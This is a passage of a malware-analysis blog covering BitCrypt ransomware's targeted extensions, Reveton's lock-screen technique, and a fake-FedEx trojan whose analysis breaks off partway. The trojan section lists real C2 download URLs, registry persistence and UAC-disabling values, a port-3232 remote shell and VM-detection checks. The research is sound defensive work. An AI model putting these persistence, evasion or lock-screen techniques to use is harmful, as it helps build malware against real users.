<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtgWySMXzSC9EeYV41s3WvE5wp04f3Is5WfdOdb0jki6GJzQLWJIpzg0eD93cWK9-wcJmpmEUVs33DnlF5Eoy1lIr7L69P0jtj1yvyUXqEY-mnUCH3BT0SpTHMaUgfEiM9mCLhnt3Xtrk/s1600/10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><span style="font-family: Arial, Helvetica, sans-serif;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtgWySMXzSC9EeYV41s3WvE5wp04f3Is5WfdOdb0jki6GJzQLWJIpzg0eD93cWK9-wcJmpmEUVs33DnlF5Eoy1lIr7L69P0jtj1yvyUXqEY-mnUCH3BT0SpTHMaUgfEiM9mCLhnt3Xtrk/s1600/10.png" height="94" width="640" /></span></a><br />
<div class="" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="" style="clear: both; text-align: left;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Infection Routine</span></b></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHaIzgTvmURA5LZschx_Iur3iTQZuMe3Q9KEonXgPd6FRkR-SovO75NkTfbsM8Qfif91zJJOKnhhIIR5nN0vUZ0AGL_pb4BtXiIkQnC34vzC90dHKz2moOqgT56HP7UAarW3rn7rwnuZY/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="color: black; font-family: Arial, Helvetica, sans-serif;"></span></a></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">This malware will encrypt files with the following file extensions:</span></div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<ul>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.dbf</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.mdb</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.mde</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.xls</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.xlw</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.docx</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.doc</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.cer</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.key</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.rtf</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.xlsm</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.xlsx</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.txt</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.xlc</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.docm</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.xlk</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.text</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.ppt</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.djvu</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.pdf</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.lzo</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.djv</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.cdx</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.cdt</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.cdr</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.bpg</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.xfm</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.dfm</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.pas</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.dpk</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.dpr</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.frm</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.vbp</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.php</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.js</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.wri</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.css</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.asm</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.jpg</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.jpeg</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.dbx</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.dbt</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.odc</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.sql</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.abw</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.pab</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.vsd</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.xsf</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.xsn</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.pps</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.lzh</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.pgp</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.arj</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.gz</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.pst</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">*.xl</span></li>
</ul>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">It will first search and list down all the files with the above file extensions.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Arial, Helvetica, sans-serif; margin-left: 1em; margin-right: 1em;"></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXTRdb0tMAXWQh6mA2unIsz5vNzfbLRY_Ye0KnzK881i8ifKVWxa15rUtZRh3TZmqevprf4kM-LVQKpWnQwlnZxwUeNJKS5V4rafLTvMVbuWaejkyoPII59_loxP50BgETd_u-aP7SvTg/s1600/12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXTRdb0tMAXWQh6mA2unIsz5vNzfbLRY_Ye0KnzK881i8ifKVWxa15rUtZRh3TZmqevprf4kM-LVQKpWnQwlnZxwUeNJKS5V4rafLTvMVbuWaejkyoPII59_loxP50BgETd_u-aP7SvTg/s1600/12.png" height="222" width="320" /></a></div>
<div class="" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">It will encrypt the target file and write the encrypted data to a new file with ".bitcrypt2" extension then delete the original file. </span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwnev7NIcSShf09Ji5FVSCfl-91mblEVLeX2H0c8kGOVgqAKPdcsQ7Zin0Tl8mg4f0IuMLGUvDsmVEHWEMeM5wJQOddqEo2NfsGXgxAtHOAzG50imJzdUElcD5Xsvdsu2mrQS_nCmK8Rs/s1600/8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwnev7NIcSShf09Ji5FVSCfl-91mblEVLeX2H0c8kGOVgqAKPdcsQ7Zin0Tl8mg4f0IuMLGUvDsmVEHWEMeM5wJQOddqEo2NfsGXgxAtHOAzG50imJzdUElcD5Xsvdsu2mrQS_nCmK8Rs/s1600/8.png" height="54" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYHYpdiV4TBS1tmxeuEJvFU7GKmuTky_rP0-JkK6frYlExVvnuf5tTIBFiSPI1bLqWe9Abk5ghPhsKwou0SEfVzdCgfhXFlEAXTeDgkOvaHDQxJSFbGL4OP3uoR0MkmBidDGZNn8hpFfg/s1600/13.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYHYpdiV4TBS1tmxeuEJvFU7GKmuTky_rP0-JkK6frYlExVvnuf5tTIBFiSPI1bLqWe9Abk5ghPhsKwou0SEfVzdCgfhXFlEAXTeDgkOvaHDQxJSFbGL4OP3uoR0MkmBidDGZNn8hpFfg/s1600/13.png" height="320" width="315" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<i>Encryption routine</i></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Payload</b></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">After encryption of files, it will change the status of infection in bitcrypt.ccw file from false to EncryptComplete.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7QYR_XXKcbq-nSKibAAVEVm11y_Wo7BqVwtGOgGaVbq87KEicjFfLYRgaoQsf88cNwzmh9vgRP-ubgWYO3odY4ufuTwxYYmT_tR40mCA9HOo3BUf0VLCNkdBRPmAgAOspZo63dz-3bSQ/s1600/14.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7QYR_XXKcbq-nSKibAAVEVm11y_Wo7BqVwtGOgGaVbq87KEicjFfLYRgaoQsf88cNwzmh9vgRP-ubgWYO3odY4ufuTwxYYmT_tR40mCA9HOo3BUf0VLCNkdBRPmAgAOspZo63dz-3bSQ/s1600/14.png" height="137" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">It will change the wall paper with BitCrypt.bmp to notify the user that the system has been infected by Bitcrypt v2.0.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieMjNzNaTy0rC4A2XSxUfxfevoAZETrZXI7L44VO7IEvZ9VAb0BZQKhE6q1kZAFSi54CKq3eg6t12bZ-H0VHBJQ_JF8cN2MP3V8M-x_-jf3dRprZFkQqcyQfz_djimmywaReaYgtB_z1g/s1600/15.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieMjNzNaTy0rC4A2XSxUfxfevoAZETrZXI7L44VO7IEvZ9VAb0BZQKhE6q1kZAFSi54CKq3eg6t12bZ-H0VHBJQ_JF8cN2MP3V8M-x_-jf3dRprZFkQqcyQfz_djimmywaReaYgtB_z1g/s1600/15.png" height="172" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">And just to make sure that the user will be able to read Bitcrypt.txt, it will open this file through notepad.exe</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitQFUm5BHHbKMZHqW2aJ-HJC6R-ScTq6mGCDNlDsXrtsgqY5OJOXP_gXB0jl6qjRBZp1ePrVL3Kmku8zjZ4TodzndwFb4SAfST_T-b_3isDZawHaky2v0nzgdb0q6E-s7tKUnOOVq_bt8/s1600/16.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitQFUm5BHHbKMZHqW2aJ-HJC6R-ScTq6mGCDNlDsXrtsgqY5OJOXP_gXB0jl6qjRBZp1ePrVL3Kmku8zjZ4TodzndwFb4SAfST_T-b_3isDZawHaky2v0nzgdb0q6E-s7tKUnOOVq_bt8/s1600/16.png" height="81" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<!-- Blogger automated replacement: "https://images-blogger-opensocial.googleusercontent.com/gadgets/proxy?url=http%3A%2F%2F1.bp.blogspot.com%2F-9dFdK7IeR9c%2FU4gfwz5t8nI%2FAAAAAAAABEo%2F-PY8J4ixnP0%2Fs1600%2F5.png&container=blogger&gadget=a&rewriteMime=image%2F*" with "https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgHaIzgTvmURA5LZschx_Iur3iTQZuMe3Q9KEonXgPd6FRkR-SovO75NkTfbsM8Qfif91zJJOKnhhIIR5nN0vUZ0AGL_pb4BtXiIkQnC34vzC90dHKz2moOqgT56HP7UAarW3rn7rwnuZY/s1600/5.png" -->bernadettehttp://www.blogger.com/profile/15725392824740427602noreply@blogger.com0tag:blogger.com,1999:blog-1227934427004236933.post-44885889312008141192014-06-02T19:12:00.002-07:002014-06-09T07:24:45.217-07:00Reveton: Lock Screen Achieved!<h1>
</h1>
<h2 style="text-align: justify; text-justify: inter-ideograph;">
Overview</h2>
<div class="MsoNormal" style="text-align: justify; text-justify: inter-ideograph;">
Reveton
is a Ransoware where it locks the users PC and claims that you have done
something wrong and that you have to pay a “Fine”. For the it to be convincing, the
Lock screen displays key details like your IP, OS, computer name and a Timer to
show how much time you have to comply. <o:p></o:p></div>
<div class="MsoNormal" style="text-align: justify; text-justify: inter-ideograph;">
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEis8U6xJpmEaWhoejDBDcbBQEn1GfTJmwikVnOXvs5EJoTXOe_pw-al4AaEVwHfT9G3mZRM872ew09kTjwjJdqmJE2RyX5XG4zV5X0C8uBFQbCOVeffbn_pck-wUjVSK4uTf2k_nK5eJRSE/s1600/Reveton_lockScreen.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEis8U6xJpmEaWhoejDBDcbBQEn1GfTJmwikVnOXvs5EJoTXOe_pw-al4AaEVwHfT9G3mZRM872ew09kTjwjJdqmJE2RyX5XG4zV5X0C8uBFQbCOVeffbn_pck-wUjVSK4uTf2k_nK5eJRSE/s1600/Reveton_lockScreen.jpg" height="355" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><div align="center" class="MsoNormal">
<span style="font-size: small;">Figure 1: The Dreaded Lock Screen</span></div>
</td></tr>
</tbody></table>
<div class="MsoNormal" style="text-align: justify; text-justify: inter-ideograph;">
<br /></div>
<div class="MsoNormal" style="text-align: justify; text-justify: inter-ideograph;">
Once the Lock Screen appears, it will block any other window from showing (Explained in Achieving Lock Screen) so you can call task manager but the Lock Screen will always be the active window</div>
<div class="MsoNormal" style="text-align: justify; text-justify: inter-ideograph;">
<br /></div>
<h3 style="text-align: justify; text-justify: inter-ideograph;">
Points of Interest</h3>
<div>
<div>
The sample did not create a copy to the windows directory nor did it modify the windows registry in such a way that the sample will be persistent since the sample file did not create an “autorun” entry in the windows registry, it did not modify registries that handle window switching, and it did not disable the windows key.</div>
<div>
Although Window switching and the window key works, navigating outside the spawned lock screen will be futile since the sample will always return the focus back to the lock screen. At least it became persistent in this aspect. </div>
</div>
<div>
<br /></div>
<div>
<h3>
Achieving Lock Screen Effect</h3>
<div>
So how can the sample lock the screen if no registry were modified or any external program dropped to do the locking? Well by Subclassing, you can intercept all calls to the window procedure of a window. That allows you to get Window Messages which is are “Statuses” of a call. One simple example of a Window Message is WM_ENABLE which signifies if a window is enabled.</div>
<div>
To better illustrate, please refer to the figure below. We will only focus on the Lock Screen Effect so the other processes (Checking if your PaySafeCard PIN Code is valid)</div>
</div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFIF8qd0iMJz95sfBsEzOA1Dow117lINctqhVi_R2OwD_gLRTO6wz9wfh30qWeqsbsMM1Ine3j6dxnsl_tvK3_CR1yKL7jrvyjinEVcnPKLMz5TrVjrjiaFCJns93ahm7Tn8-dMvb_ZUMp/s1600/Reveton_lockScreen-FlowChart.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFIF8qd0iMJz95sfBsEzOA1Dow117lINctqhVi_R2OwD_gLRTO6wz9wfh30qWeqsbsMM1Ine3j6dxnsl_tvK3_CR1yKL7jrvyjinEVcnPKLMz5TrVjrjiaFCJns93ahm7Tn8-dMvb_ZUMp/s1600/Reveton_lockScreen-FlowChart.jpg" height="604" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 2: The Lock Screen Effect Flow chart</td></tr>
</tbody></table>
<div>
<br /></div>
<div class="MsoNormal" style="text-align: justify; text-justify: inter-ideograph;">
The chart is great but that does not explain why the Lock does not close when you use the alt+f4 command. Well the problem is the picture with all those rambling about you have done something wrong is not the main window, it is just a place holder the image saying that you did something wrong. The main window, or at least the window where your keyboard cursor is placed, is actually another separate window just place in front of it. Layered approach similar in photo editing in Adobe Photoshop. If that is not enough, the sample is generating dummy windows in the background to catch stray close operation.</div>
<div class="MsoNormal" style="text-align: justify; text-justify: inter-ideograph;">
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgH-60GfiAOldC1Q027ukGkc3GnPFcQhwRuUgFzqXdVe4w4p_DeAOqT1ARdfYYH1S3C-f3QnD6nvKllCUK4Km9e0Dv5EFaGch8Aqaa4kJm5WdFFQEXQ9O9tUgNk6YSBRiO9ZJ0Tjn_BDPPx/s1600/Reveton_lockScreen_Layout.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgH-60GfiAOldC1Q027ukGkc3GnPFcQhwRuUgFzqXdVe4w4p_DeAOqT1ARdfYYH1S3C-f3QnD6nvKllCUK4Km9e0Dv5EFaGch8Aqaa4kJm5WdFFQEXQ9O9tUgNk6YSBRiO9ZJ0Tjn_BDPPx/s1600/Reveton_lockScreen_Layout.jpg" height="294" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 3: The Lock Screen Layout</td></tr>
</tbody></table>
<div class="MsoNormal" style="text-align: justify; text-justify: inter-ideograph;">
<br /></div>
<h3 style="text-align: justify; text-justify: inter-ideograph;">
Conclusion</h3>
<div class="MsoNormal" style="text-align: justify; text-justify: inter-ideograph;">
This sample proved that, contrary to popular belief, you do not need to modify windows registry to keep the user focused on the created lock screen. The author of this file is aware of current AV’s capability to track dropped files and modify registries in which he tried to compensate for that through the mentioned technique but it does make you wonder what the next lock screen technique will be. Perhaps we will see it soon, timer did say I still have 1 day to give them my PaySafeCard PIN Code.</div>
<ol><ul>
</ul>
</ol>
<div style="text-align: justify;">
<br /></div>
Wren Fer Balangcodhttp://www.blogger.com/profile/11892442983440016445noreply@blogger.com0tag:blogger.com,1999:blog-1227934427004236933.post-22608681789930073882014-05-31T01:03:00.001-07:002014-05-31T01:03:50.787-07:00Spam mail from fake FedEx<div class="MsoNormal">
Here is a screenshot of the spam mail which claims to be
from FedEx.<o:p></o:p></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5P8ihIQJdfloG_VRuHaar1YPNVDQqf6LjR3vPiGtS5P_RbQNRJ0cTTiK199QmvNR7aywf2QZM14EUUcAQ7ug3czuosEnSjnpWZ2cnKa0mrZYrzq_pDn9rFxrhyoozyz6iWrA-kseKmpy5/s1600/1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5P8ihIQJdfloG_VRuHaar1YPNVDQqf6LjR3vPiGtS5P_RbQNRJ0cTTiK199QmvNR7aywf2QZM14EUUcAQ7ug3czuosEnSjnpWZ2cnKa0mrZYrzq_pDn9rFxrhyoozyz6iWrA-kseKmpy5/s1600/1.png" height="393" width="640" /></a><o:p> </o:p></div>
<div class="MsoNormal" style="text-align: justify;">
You will notice that the email address in the From field is
suspicious already since it does not use the fedex.com domain.<o:p></o:p></div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
The ZIP file contains an executable file that is disguised
as a PDF file. It uses the double extension .PDF.EXE and uses icon of Acrobat
PDF. We currently detect this as Trojan.Win32.Injector.awxd (v)<o:p></o:p></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<b>Summary</b></div>
<div class="MsoNormal">
<b><br /></b></div>
<div class="MsoNormal">
Upon execution, it creates a copy of itself as:<o:p></o:p></div>
<div class="MsoNormal">
</div>
<div class="MsoNormal">
<span style="font-family: "Verdana","sans-serif"; font-size: 8.0pt; line-height: 115%;">%ALLUSERSPROFILE %\m<random string>.exe<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
To execute itself every time Windows starts, it adds the
following registry key:<o:p></o:p></div>
<div class="MsoNormal">
<span style="font-family: "Verdana","sans-serif"; font-size: 8.0pt; line-height: 115%;">HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "Verdana","sans-serif"; font-size: 8.0pt; line-height: 115%;">56140 = "%ALLUSERSPROFILE %"\m<random
string>.exe<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
It sets the following registry entries to:<o:p></o:p></div>
<div class="MsoNormal">
<span style="font-family: "Verdana","sans-serif"; font-size: 8.0pt; line-height: 115%;">HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "Verdana","sans-serif"; font-size: 8.0pt; line-height: 115%;">TaskbarNoNotification = 0<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "Verdana","sans-serif"; font-size: 8.0pt; line-height: 115%;">HideSCAHealth = 0<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "Verdana","sans-serif"; font-size: 8.0pt; line-height: 115%;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "Verdana","sans-serif"; font-size: 8.0pt; line-height: 115%;">TaskbarNoNotification = 0<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "Verdana","sans-serif"; font-size: 8.0pt; line-height: 115%;">HideSCAHealth = 0<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "Verdana","sans-serif"; font-size: 8.0pt; line-height: 115%;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "Verdana","sans-serif"; font-size: 8.0pt; line-height: 115%;">EnableLUA = 0<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
It also deletes the following registry:<span style="font-family: "Verdana","sans-serif"; font-size: 8.0pt; line-height: 115%;"><o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "Verdana","sans-serif"; font-size: 8.0pt; line-height: 115%;">HKEY_CURRENT_USER\</span>S<span style="font-family: "Verdana","sans-serif"; font-size: 8.0pt; line-height: 115%;">oftware\Microsoft\Windows NT\CurrentVersion\Image
File Execution<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "Verdana","sans-serif"; font-size: 8.0pt; line-height: 115%;">taskmgr.exe<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
It then spawns an instance of the non-malicious file %SYSTEM%\msiexec.exe.
Afterwards, it injects its malicious code to this process. It then deletes itself
and downloads the following URLs:<o:p></o:p></div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal">
<span style="font-family: "Verdana","sans-serif"; font-size: 8.0pt; line-height: 115%;"><http>://37.139.47.56/srt/404.php<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "Verdana","sans-serif"; font-size: 8.0pt; line-height: 115%;"><http>://62.76.187.171/srt/404.php<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "Verdana","sans-serif"; font-size: 8.0pt; line-height: 115%;"><http>://85.143.166.119/srt/404.php<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
At the time of this writing, the servers now return an HTTP Error
404 Not Found and we are not able to analyze additional downloaded components.
But based on its code, the server will give out another URL which contains either
an EXE file or a ZIP file: <o:p></o:p></div>
<div class="MsoNormal" style="text-align: left;">
<br /></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">seg000:7FFA2C44 cmp word ptr [eax], 'ZM' ; check
for 'MZ' indicates it is an EXE file<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">seg000:7FFA2C49 jz short loc_7FFA2C7F<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">seg000:7FFA2C4B cmp dword ptr [eax], 4034B50h ; check for 'PK' indicates ZIP file<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">seg000:7FFA2C51 jz short loc_7FFA2C70<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<b>A Different Payload</b></div>
<div class="MsoNormal">
<b><br /></b></div>
<div class="MsoNormal" style="text-align: justify;">
This malware employs multiple anti-analysis techniques. One
reason it does this is to make analysis difficult for us malware researchers.
In addition, it executes a different payload once it detects that it is being analysed.
Instead of carrying out the <span lang="EN-US">behavior</span><span lang="EN-US"> </span>that was stated in the Summary section, the following modifications
will be done:<o:p></o:p></div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal">
Creates a copy of itself as:<o:p></o:p></div>
<div class="MsoNormal">
<span style="font-family: "Verdana","sans-serif"; font-size: 8.0pt; line-height: 115%;">%ALLUSERSPROFILE %\explorer.exe<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
To execute itself every time Windows starts, it adds the
following registry key:<o:p></o:p></div>
<div class="MsoNormal">
<span style="font-family: "Verdana","sans-serif"; font-size: 8.0pt; line-height: 115%;">HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: "Verdana","sans-serif"; font-size: 8.0pt; line-height: 115%;">Start WingMan Profiler = "%ALLUSERSPROFILE %"\explorer.exe<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
Opens and listens to port 3232. If someone connects to this
port, a remote shell command prompt will be opened.<o:p></o:p></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<b>Anti-analysis
Techniques</b></div>
<div class="MsoNormal">
<b><br /></b></div>
<div class="MsoNormal">
To start, it checks the environment it is being run on. <o:p></o:p></div>
<div class="MsoListParagraphCxSpFirst" style="mso-list: l0 level1 lfo1; text-indent: -.25in;">
</div>
<ul>
<li><span style="text-indent: -0.25in;">Checks process names for </span><span style="font-family: Verdana, sans-serif; font-size: 8pt; line-height: 115%; text-indent: -0.25in;">VBoxService.exe</span><span style="text-indent: -0.25in;">
(VirtualBox) and </span><span style="font-family: Verdana, sans-serif; font-size: 8pt; line-height: 115%; text-indent: -0.25in;">vmtoolsd.exe</span><span style="text-indent: -0.25in;"> (VMware)</span></li>
<li><span style="text-indent: -0.25in;">Queries registry </span><span style="font-family: Verdana, sans-serif; font-size: 8pt; line-height: 115%; text-indent: -0.25in;">HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Disk\Enum</span><span style="text-indent: -0.25in;">
and compares with strings:</span></li>
</ul>
<div class="MsoNormal" style="margin-left: .5in;">
<span style="font-size: 8.0pt; line-height: 115%;">_1961:00401E8E
cmp dword ptr [ebp-364h],
'awmv'<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: .5in;">
